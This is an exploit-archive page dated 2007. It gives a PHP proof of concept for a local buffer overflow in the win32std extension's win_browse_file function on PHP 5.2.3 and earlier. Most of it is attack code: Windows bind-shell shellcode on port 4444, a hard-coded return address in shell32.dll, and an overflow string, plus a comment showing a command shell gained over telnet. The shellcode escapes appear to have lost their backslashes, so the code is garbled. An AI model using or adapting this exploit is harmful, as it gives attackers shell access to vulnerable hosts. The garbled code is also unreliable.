PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit
# Published : 2007-08-22
# Author : Inphex
# Previous Title : PHP Perl Extension Safe_mode BypassExploit
# Next Title : PHP FFI Extension 5.0.5 Local Safe_mode Bypass Exploit

<?php
/*
Inphex
317 Bytes , Windows Command Shell  Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1n

telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:apache>
7ffdf020  7c911005 7c9110ed 00000001 00000000

shoutz go to Kevin Finisterre
*/

if(!function_exists('win_browse_file')) {
die('win32std extension is not available');
}
$shellcode=
"x2bxc9xb1x51xbaxbbxb2xd5x31xdaxdaxd9x74x24xf4".
"x58x31x50x0ex83xc0x04x03xebxb8x37xc4xf7xd7x5c".
"x6axefxd1x5cx8ax10x41x28x19xcaxa6xa5xa7x2ex2c".
"xc5x22x36x33xd9xa6x89x2bxaexe6x35x4dx5bx51xbe".
"x79x10x63x2exb0xe6xfdx02x37x26x89x5dxf9x6dx7f".
"x60x3bx9ax74x59xefx79x5dxe8xeax09xc2x36xf4xe6".
"x9bxbdxfaxb3xe8x9ex1ex45x04x23x33xcex53x4fx6f".
"xccx02x4cx5ex37xa0xd9xe2xf7xa2x9dxe8x7cxc4x01".
"x5cx09x65x31xc0x66xe8x0fxf2x9axa4x70xdcx05x16".
"xe8x89xfaxaax9cx3ex8exf8x03x95x8fx2dxd3xdex9d".
"x32x18xb1xa2x1dx01xb8xb8xc4x3cx57x4ax0bx6bxc2".
"x49xf4x43x7ax97x03x96xd6x70xebx8ex7ax2cx40x7d".
"x2ex91x35xc2x83xeax6axa2x4bx04xd7x4cxdfxafx06".
"x05xb7x0bxd2x55x8fx03x1cx43x65xbcxb3x3ex85x6c".
"x5bx64xd4xa3x75x33xd8x6axd6xeexd9x43xb1xf5x6f".
"xe2x0bxa2x90x3cxdbx18x3bx94x23x70x50x7ex3bx09".
"x91x06x94x16xcbxacxe5x38x92x24x7exdex33xdax13".
"x97x21x76xbcxfex80x4bxb5xe7xb9x17x4fx05x0cx58".
"xbcx63x91x1ax6ex8dx2cxb7xe3xfcxcbxffxa8x55x80".
"x68xddx57x64x7exdexd2xcfx80xf6x47x87x2cxa6x26".
"x76xbbx49x99x29x6ex1bxe6x1axf8x36xc1x9ex37x1b".
"x0ex76xadx63x0fx40xcdx4cx64xf8xcdxeexbex63xd1".
"x27x6cx93xfdxa0x60xe1xfax6fxd3x09xd4x6fx03xf5".
"xd9x8f";

$eip = "xDCx1Cx9Cx7C"; //shell32.dll
win_browse_file( 1, NULL, str_repeat( "A", 260 )."".$eip."XXXXx20xf0xfdx7f".str_repeat("C",500).$shellcode.str_repeat("C",300), NULL, array( "*" => "*.*" ) );
?>

# www.Syue.com [2007-08-22]